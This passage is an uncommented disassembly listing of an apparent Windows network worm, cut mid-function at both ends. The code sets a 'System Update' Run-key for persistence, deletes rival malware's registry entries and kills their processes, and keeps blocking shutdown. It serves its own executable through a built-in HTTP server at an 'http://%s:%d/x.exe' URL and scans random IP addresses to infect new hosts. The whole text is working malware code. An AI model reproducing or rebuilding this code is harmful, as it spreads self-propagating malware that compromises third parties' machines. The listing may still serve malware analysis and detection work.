var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_3150117C ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_31501A14
call dword_31501180 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_31501A14: ; CODE XREF: sub_315019F3+15�j
lea eax, [ebp+var_34]
push eax
call dword_31501188 ; gethostbyname
test eax, eax
jnz short loc_31501A29
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_31501A29: ; CODE XREF: sub_315019F3+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_315019F3 endp
; =============== S U B R O U T I N E =======================================
sub_31501A32 proc near ; CODE XREF: sub_315020C4+22�p
; sub_31502128+27�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_3150115C ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31501A32 endp
; =============== S U B R O U T I N E =======================================
sub_31501A48 proc near ; CODE XREF: sub_31501D96+40�p
; sub_31501D96+4C�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_315010DC ; OpenEventA
test eax, eax
jz short locret_31501A61
push eax
call dword_315010D8 ; SetEvent
locret_31501A61: ; CODE XREF: sub_31501A48+10�j
retn
sub_31501A48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501A62 proc near ; DATA XREF: sub_31501BA8+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_31501A93
push 1
jmp loc_31501B4E
; ---------------------------------------------------------------------------
loc_31501A93: ; CODE XREF: sub_31501A62+28�j
mov esi, dword_31501120
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; dword_31501120
pop ecx
test eax, eax
pop ecx
jz loc_31501B5E
lea eax, [ebp+var_100]
push offset a_exe ; ".exe"
push eax
call esi ; dword_31501120
pop ecx
test eax, eax
pop ecx
jz loc_31501B5E
mov esi, dword_3150119C
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; dword_3150119C
push ds:dword_31506160
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_31503A3E ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; dword_3150119C
loc_31501B10: ; CODE XREF: sub_31501A62+E8�j
mov eax, ds:dword_31506160
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_31501B22
mov eax, ecx
loc_31501B22: ; CODE XREF: sub_31501A62+BC�j
test eax, eax
jz short loc_31501B51
push 0
push eax
mov eax, ds:dword_31506158
add eax, edi
push eax
push ebx
call esi ; dword_3150119C
cmp eax, 0FFFFFFFFh
jz short loc_31501B4C
cmp eax, 1000h
jb short loc_31501B51
push 64h
add edi, eax
call dword_315010A4 ; Sleep
jmp short loc_31501B10
; ---------------------------------------------------------------------------
loc_31501B4C: ; CODE XREF: sub_31501A62+D5�j
push 2
loc_31501B4E: ; CODE XREF: sub_31501A62+2C�j
pop eax
jmp short loc_31501BA1
; ---------------------------------------------------------------------------
loc_31501B51: ; CODE XREF: sub_31501A62+C2�j
; sub_31501A62+DC�j
push offset dword_3150615C
call dword_315010E4 ; InterlockedIncrement
jmp short loc_31501B7C
; ---------------------------------------------------------------------------
loc_31501B5E: ; CODE XREF: sub_31501A62+49�j
; sub_31501A62+61�j
mov esi, dword_3150119C
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; dword_3150119C
push 0
push 3
push offset dword_31505A84
push ebx
call esi ; dword_3150119C
loc_31501B7C: ; CODE XREF: sub_31501A62+FA�j
push 7D0h
call dword_315010A4 ; Sleep
push 2
push ebx
call dword_315011A4 ; shutdown
push ebx
call dword_315011A8 ; closesocket
push 0
call dword_315010E0 ; ExitThread
xor eax, eax
loc_31501BA1: ; CODE XREF: sub_31501A62+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_31501A62 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501BA8 proc near ; DATA XREF: sub_31501D96+14B�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_315018BA
lea eax, [ebp+var_130]
push 104h
push eax
push offset aSystemUpdate ; "System Update"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov ds:dword_3150615C, ebx
call sub_315023E4
add esp, 14h
test eax, eax
jnz loc_31501CDD
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_315010F0 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31501C14
push 1
call dword_315010E0 ; ExitThread
loc_31501C14: ; CODE XREF: sub_31501BA8+62�j
push ebx
push esi
call dword_315010EC ; GetFileSize
push eax
mov ds:dword_31506160, eax
call sub_31502800
pop ecx
mov ds:dword_31506158, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push ds:dword_31506160
push eax
push esi
call dword_315010E8 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov ds:dword_31506160, eax
call dword_315010BC ; CloseHandle
push ebx
push 1
push 2
call dword_3150118C ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31503A38 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_31501C76: ; CODE XREF: sub_31501BA8+E5�j
; sub_31501BA8+ED�j ...
call dword_31501124 ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov ds:dword_3150618C, eax
jz short loc_31501C76
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_31501C76
push eax
call dword_31501194 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31501170 ; bind
test eax, eax
jnz short loc_31501C76
push 64h
push edi
call dword_31501174 ; listen
mov [ebp+var_8], esi
pop esi
loc_31501CBF: ; CODE XREF: sub_31501BA8+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31501178 ; accept
push eax
push offset sub_31501A62
call sub_31501911
pop ecx
pop ecx
jmp short loc_31501CBF
; ---------------------------------------------------------------------------
loc_31501CDD: ; CODE XREF: sub_31501BA8+3D�j
push ebx
call dword_315010E0 ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_31501BA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501CEC proc near ; CODE XREF: sub_31501D96:loc_31501EB6�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3150116C
push eax
push 2
call esi ; dword_3150116C
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; dword_3150116C
pop esi
leave
retn
sub_31501CEC endp
; ---------------------------------------------------------------------------
loc_31501D18: ; CODE XREF: UPX1:31508558�j
push 0
call dword_315010C4 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov ds:dword_31506190, eax
call dword_31501094 ; DeleteFileA
call sub_315018BA
push offset aUterm13_2i ; "uterm13.2i"
call sub_315018E8
pop ecx
mov ds:dword_31506164, eax
call dword_31501098 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31501D5A
push 1
call dword_3150109C ; ExitProcess
loc_31501D5A: ; CODE XREF: UPX0:31501D50�j
call sub_31501727
call sub_31502548
call sub_315026C2
push offset sub_31501D96
call sub_315017AF
test eax, eax
pop ecx
jz short loc_31501D7F
push 0
call sub_31501D96
loc_31501D7F: ; CODE XREF: UPX0:31501D76�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_31501D82 proc near ; CODE XREF: sub_31501D96:loc_31501F04�p
; sub_315020C4:loc_315020DD�p ...
push 0
push ds:dword_31506168
call dword_31501090 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_31501D82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501D96 proc near ; CODE XREF: UPX0:31501D7A�p
; DATA XREF: UPX0:31501D69�o
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_315011B0
push offset loc_31503A80
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
push offset aU13_2ix ; "u13.2ix"
xor edi, edi
push edi
push 1
push edi
call dword_3150108C ; CreateEventA
mov ds:dword_31506168, eax
mov [ebp+var_4], edi
push offset aU10x ; "u10x"
call sub_31501A48
mov [esp+8+var_8], offset aU11x ; "u11x"
call sub_31501A48
mov [esp+8+var_8], offset aU12x ; "u12x"
call sub_31501A48
mov [esp+8+var_8], offset aU13x ; "u13x"
call sub_31501A48
mov [esp+8+var_8], offset aU13ix ; "u13ix"
call sub_31501A48
mov [esp+8+var_8], offset aU8 ; "u8"
call sub_315018E8
mov [esp+8+var_8], offset aU9 ; "u9"
call sub_315018E8
mov [esp+8+var_8], offset aU10 ; "u10"
call sub_315018E8
mov [esp+8+var_8], offset aU11 ; "u11"
call sub_315018E8
mov [esp+8+var_8], offset aU12 ; "u12"
call sub_315018E8
mov [esp+8+var_8], offset aU13 ; "u13"
call sub_315018E8
mov [esp+8+var_8], offset aU13i ; "u13i"
call sub_315018E8
mov [esp+8+var_8], offset aU13_2i ; "u13.2i"
call sub_315018E8
mov [esp+8+var_8], offset aU14 ; "u14"
call sub_315018E8
pop ecx
cmp [ebp+arg_0], edi
jz short loc_31501EB6
push offset aWs2_32 ; "ws2_32"
mov esi, dword_315010B4
call esi ; dword_315010B4
push offset aWininet ; "wininet"
call esi ; dword_315010B4
push offset aMsvcrt ; "msvcrt"
call esi ; dword_315010B4
push offset aAdvapi32 ; "advapi32"
call esi ; dword_315010B4
push offset aUser32 ; "user32"
call esi ; dword_315010B4
push offset aUterm13_2i ; "uterm13.2i"
call sub_315018E8
pop ecx
mov ds:dword_31506164, eax
loc_31501EB6: ; CODE XREF: sub_31501D96+E5�j
call sub_31501CEC
push edi
push offset sub_31501F6B
call sub_31501911
pop ecx
pop ecx
push 1F4h
mov esi, dword_315010A4
call esi ; dword_315010A4
push edi
push offset loc_31503408
call sub_315018F7
push edi
push offset sub_31501BA8
call sub_315018F7
push edi
push offset sub_31502BE8
call sub_315018F7
push edi
push offset loc_315022D3
call sub_315018F7
add esp, 20h
loc_31501F04: ; CODE XREF: sub_31501D96+185�j
call sub_31501D82
test eax, eax
jnz short loc_31501F1D
push edi
call dword_31501038 ; AbortSystemShutdownA
push 1388h
call esi ; dword_315010A4
jmp short loc_31501F04
; ---------------------------------------------------------------------------
loc_31501F1D: ; CODE XREF: sub_31501D96+175�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_31501D96 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_31501F3A proc near ; CODE XREF: sub_31501F6B+F9�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_31503A3E ; strlen
test eax, eax
pop ecx
jbe short loc_31501F68
loc_31501F4D: ; CODE XREF: sub_31501F3A+2C�j
mov al, [esi+edi]
cmp al, 0Ah
jz short loc_31501F58
cmp al, 0Dh
jnz short loc_31501F5C
loc_31501F58: ; CODE XREF: sub_31501F3A+18�j
and byte ptr [esi+edi], 0
loc_31501F5C: ; CODE XREF: sub_31501F3A+1C�j
push edi
inc esi
call sub_31503A3E ; strlen
cmp esi, eax
pop ecx
jb short loc_31501F4D
loc_31501F68: ; CODE XREF: sub_31501F3A+11�j
pop edi
pop esi
retn
sub_31501F3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501F6B proc near ; DATA XREF: sub_31501D96+126�o
var_154 = dword ptr -154h
var_148 = byte ptr -148h
var_48 = byte ptr -48h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 148h
push ebx
mov [ebp+var_8], esp
call sub_315018BA
call dword_31501124 ; rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_48]
add edx, 3
push edx
push eax
call sub_31501932
lea eax, [ebp+var_48]
mov ebx, offset dword_3150616C
push eax
push ebx
call sub_31503A8C ; strcpy
add esp, 10h
mov [ebp+var_4], 10h
push 0
push 1
push 2
call dword_3150118C ; socket
push 0
mov [ebp+var_8], eax
mov [ebp+var_18], 2
call dword_31501168 ; ntohl
push 71h
mov [ebp+var_14], eax
call dword_31501194 ; ntohs
push [ebp+var_4]
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push eax
push [ebp+var_8]
call dword_31501170 ; bind
test eax, eax
jz short loc_31501FF7
push 1
pop eax
loc_31501FF2: ; CODE XREF: sub_31501F6B+A2�j
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31501FF7: ; CODE XREF: sub_31501F6B+82�j
push esi
push edi
push 5
push [ebp+var_8]
call dword_31501174 ; listen
test eax, eax
jz short loc_3150200F
push 1
pop eax
pop edi
pop esi
jmp short loc_31501FF2
; ---------------------------------------------------------------------------
loc_3150200F: ; CODE XREF: sub_31501F6B+9B�j
mov edi, dword_315010A4
loc_31502015: ; CODE XREF: sub_31501F6B+C6�j
; sub_31501F6B+E8�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+var_8]
call dword_31501178 ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31502033
push 64h
call edi ; dword_315010A4
jmp short loc_31502015
; ---------------------------------------------------------------------------
loc_31502033: ; CODE XREF: sub_31501F6B+C0�j
push 0
lea eax, [ebp+var_148]
push 100h
push eax
push esi
call dword_315011A0 ; recv
test eax, eax
jnz short loc_31502055
loc_3150204C: ; CODE XREF: sub_31501F6B+157�j
push esi
call dword_315011A8 ; closesocket
jmp short loc_31502015
; ---------------------------------------------------------------------------
loc_31502055: ; CODE XREF: sub_31501F6B+DF�j
and [ebp+eax+var_148], 0
lea eax, [ebp+var_148]
push eax
call sub_31501F3A
lea eax, [ebp+var_148]
mov [esp+154h+var_154], offset aUseridUnix ; " : USERID : UNIX : "
push eax
call sub_31503A86 ; strcat
lea eax, [ebp+var_148]
push ebx
push eax
call sub_31503A86 ; strcat
lea eax, [ebp+var_148]
push offset asc_31505B8C ; "\r\n"
push eax
call sub_31503A86 ; strcat
add esp, 18h
lea eax, [ebp+var_148]
push 0
push eax
call sub_31503A3E ; strlen
pop ecx
push eax
lea eax, [ebp+var_148]
push eax
push esi
call dword_3150119C ; send
push 1388h
call edi ; dword_315010A4
jmp short loc_3150204C
sub_31501F6B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315020C4 proc near ; DATA XREF: sub_31502128+55�o
; sub_315021B0+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_315020D3
push 1
pop eax
jmp short locret_31502124
; ---------------------------------------------------------------------------
loc_315020D3: ; CODE XREF: sub_315020C4+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_315020DD: ; CODE XREF: sub_315020C4+5A�j
call sub_31501D82
test eax, eax
jnz short loc_31502120
call sub_31501A32
test eax, eax
jz short loc_31502120
cmp [ebp+var_1], bl
jz short loc_31502119
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_315011C0
movzx esi, ds:word_3150619C
pop ecx
call dword_31501124 ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_315010A4 ; Sleep
loc_31502119: ; CODE XREF: sub_315020C4+2E�j
inc bl
cmp bl, 0FFh
jb short loc_315020DD
loc_31502120: ; CODE XREF: sub_315020C4+20�j
; sub_315020C4+29�j
pop esi
xor eax, eax
pop ebx
locret_31502124: ; CODE XREF: sub_315020C4+D�j
leave
retn 4
sub_315020C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502128 proc near ; DATA XREF: sub_315021B0+7E�o
; UPX0:31502365�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31502136
push 1
pop eax
jmp short loc_315021AC
; ---------------------------------------------------------------------------
loc_31502136: ; CODE XREF: sub_31502128+7�j
push ebx
push esi
push edi
call sub_315018BA
mov esi, dword_31501124
xor ebx, ebx
loc_31502146: ; CODE XREF: sub_31502128+7D�j
call sub_31501D82
test eax, eax
jnz short loc_315021A7
call sub_31501A32
test eax, eax
jz short loc_315021A7
call esi ; dword_31501124
mov byte ptr [ebp+arg_0+2], al
call esi ; dword_31501124
push offset dword_31506194
mov byte ptr [ebp+arg_0+3], al
call dword_315010E4 ; InterlockedIncrement
push [ebp+arg_0]
call sub_315011C0
test eax, eax
pop ecx
jnz short loc_31502189
push [ebp+arg_0]
push offset sub_315020C4
call sub_31501911
pop ecx
pop ecx
loc_31502189: ; CODE XREF: sub_31502128+50�j
movzx edi, ds:word_3150619C
call esi ; dword_31501124
cdq
idiv edi
add edx, edi
push edx
call dword_315010A4 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_31502146
loc_315021A7: ; CODE XREF: sub_31502128+25�j
; sub_31502128+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_315021AC: ; CODE XREF: sub_31502128+C�j
pop ebp
retn 4
sub_31502128 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315021B0 proc near ; DATA XREF: UPX0:3150237D�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_315018BA
call sub_31501D82
test eax, eax
jnz loc_31502269
push ebx
mov ebx, dword_315010A4
push esi
mov esi, dword_31501124
push edi
loc_315021D6: ; CODE XREF: sub_315021B0+48�j
; sub_315021B0+B0�j
call esi ; dword_31501124
mov byte ptr [ebp+var_4+1], al
call esi ; dword_31501124
mov byte ptr [ebp+var_4+3], al
call esi ; dword_31501124
mov byte ptr [ebp+var_4+2], al
loc_315021E5: ; CODE XREF: sub_315021B0+3C�j
call esi ; dword_31501124
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_315021E5
call sub_315019F3
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_315021D6
call sub_31501A32
test eax, eax
jz short loc_31502241
push offset dword_31506194
call dword_315010E4 ; InterlockedIncrement
push edi
call sub_315011C0
test eax, eax
pop ecx
jnz short loc_31502248
push edi
push offset sub_315020C4
call sub_31501911
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_3150222D: ; CODE XREF: sub_315021B0+8D�j
push edi
push offset sub_31502128
call sub_31501911
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_3150222D
jmp short loc_31502248
; ---------------------------------------------------------------------------
loc_31502241: ; CODE XREF: sub_315021B0+51�j
push 2710h
call ebx ; dword_315010A4
loc_31502248: ; CODE XREF: sub_315021B0+67�j
; sub_315021B0+8F�j
movzx edi, ds:word_3150619C
call esi ; dword_31501124
cdq
idiv edi
add edx, edi
push edx
call ebx ; dword_315010A4
call sub_31501D82
test eax, eax
jz loc_315021D6
pop edi
pop esi
pop ebx
loc_31502269: ; CODE XREF: sub_315021B0+11�j
push 0
call dword_315010E0 ; ExitThread
xor eax, eax
leave
retn 4
sub_315021B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502277 proc near ; CODE XREF: UPX0:loc_3150233E�p
; UPX0:loc_315023A8�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_315019F3
push eax
call dword_31501190 ; inet_ntoa
mov esi, dword_31501088
push eax
lea eax, [ebp+var_28]
push eax
call esi ; dword_31501088
push ds:dword_3150618C
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_3150113C ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_31505002
call esi ; dword_31501088
push offset byte_31505000
call dword_315010A0 ; lstrlenA
mov byte_31505000[eax], 0DFh
pop esi
leave
retn
sub_31502277 endp
; ---------------------------------------------------------------------------
loc_315022D3: ; DATA XREF: sub_31501D96+161�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebp, ebp
push edi
mov ds:dword_31506194, ebp
call sub_31501A32
mov esi, dword_315010A4
mov edi, 1388h
test eax, eax
jnz short loc_31502301
loc_315022F5: ; CODE XREF: UPX0:315022FF�j
push edi
call esi ; dword_315010A4
call sub_31501A32
test eax, eax
jz short loc_315022F5
loc_31502301: ; CODE XREF: UPX0:315022F3�j
lea eax, [esp+14h]
push ebp
push eax
call dword_3150115C ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov ds:dword_31506198, ebp
pop ebx
mov ds:word_3150619C, 96h
jz short loc_3150233E
mov ds:dword_31506198, 1
mov ebx, 15Eh
mov ds:word_3150619C, 14h
loc_3150233E: ; CODE XREF: UPX0:31502324�j
call sub_31502277
mov ebp, [esp+14h]
cmp ebp, 100007Fh
jz short loc_3150235C
push ebp
push offset sub_315020C4
call sub_31501911
pop ecx
pop ecx
loc_3150235C: ; CODE XREF: UPX0:3150234D�j
mov dword ptr [esp+10h], 4
loc_31502364: ; CODE XREF: UPX0:31502375�j
push ebp
push offset sub_31502128
call sub_31501911
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_31502364
test ebx, ebx
jle short loc_3150238C
loc_3150237B: ; CODE XREF: UPX0:3150238A�j
push 0
push offset sub_315021B0
call sub_31501911
pop ecx
dec ebx
pop ecx
jnz short loc_3150237B
loc_3150238C: ; CODE XREF: UPX0:31502379�j
; UPX0:31502398�j ...
call sub_31501A32
test eax, eax
jz short loc_3150239A
push edi
call esi ; dword_315010A4
jmp short loc_3150238C
; ---------------------------------------------------------------------------
loc_3150239A: ; CODE XREF: UPX0:31502393�j
; UPX0:315023A6�j
call sub_31501A32
test eax, eax
jnz short loc_315023A8
push edi
call esi ; dword_315010A4
jmp short loc_3150239A
; ---------------------------------------------------------------------------
loc_315023A8: ; CODE XREF: UPX0:315023A1�j
call sub_31502277
jmp short loc_3150238C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315023AF proc near ; CODE XREF: sub_31502548+8C�p
; sub_315026C2+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3150102C ; RegOpenKeyExA
test eax, eax
jnz short loc_315023E2
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31501030 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31501034 ; RegCloseKey
loc_315023E2: ; CODE XREF: sub_315023AF+1C�j
pop ebp
retn
sub_315023AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315023E4 proc near ; CODE XREF: sub_31501BA8+33�p
; sub_31502548+7D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3150102C ; RegOpenKeyExA
test eax, eax
jz short loc_31502410
push 1
pop eax
jmp short loc_3150243A
; ---------------------------------------------------------------------------
loc_31502410: ; CODE XREF: sub_315023E4+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31501028 ; RegQueryValueExA
test eax, eax
jz short loc_3150242F
push 2
pop esi
loc_3150242F: ; CODE XREF: sub_315023E4+46�j
push [ebp+arg_10]
call dword_31501034 ; RegCloseKey
mov eax, esi
loc_3150243A: ; CODE XREF: sub_315023E4+2A�j
pop esi
leave
retn
sub_315023E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150243D proc near ; CODE XREF: sub_315025F6+96�p
; sub_315026C2+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31501020 ; RegCreateKeyExA
test eax, eax
jz short loc_31502466
push 1
pop eax
jmp short loc_3150248D
; ---------------------------------------------------------------------------
loc_31502466: ; CODE XREF: sub_3150243D+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31501024 ; RegSetValueExA
test eax, eax
jz short loc_31502482
push 2
pop esi
loc_31502482: ; CODE XREF: sub_3150243D+40�j
push [ebp+arg_4]
call dword_31501034 ; RegCloseKey
mov eax, esi
loc_3150248D: ; CODE XREF: sub_3150243D+27�j
pop esi
pop ebp
retn
sub_3150243D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502490 proc near ; CODE XREF: sub_31502548+98�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_315010A0 ; lstrlenA
mov esi, eax
dec esi
test esi, esi
jle loc_31502544
loc_315024B0: ; CODE XREF: sub_31502490+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_315024B9
dec esi
jns short loc_315024B0
loc_315024B9: ; CODE XREF: sub_31502490+24�j
push 0
push 2
call sub_31503ABC ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_31502544
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31503A38 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_31503AB6 ; Process32First
test eax, eax
jz short loc_31502544
lea esi, [esi+ebx+1]
loc_31502501: ; CODE XREF: sub_31502490+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31502531
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_315010C0 ; OpenProcess
push 0
push eax
call dword_31501080 ; TerminateProcess
loc_31502531: ; CODE XREF: sub_31502490+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31503AB0 ; Process32Next
test eax, eax
jnz short loc_31502501
loc_31502544: ; CODE XREF: sub_31502490+1A�j
; sub_31502490+38�j ...
pop esi
pop ebx
leave
retn
sub_31502490 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502548 proc near ; CODE XREF: UPX0:31501D5F�p
var_138 = byte ptr -138h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
lea eax, [ebp+var_30]
push edi
mov [ebp+var_30], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_2C], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_28], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_24], offset aBotLoader ; "Bot Loader"
mov [ebp+var_20], offset aSystray ; "SysTray"
mov [ebp+var_1C], offset aWinupdate ; "WinUpdate"
mov [ebp+var_18], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_14], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_10], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_C], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Ah
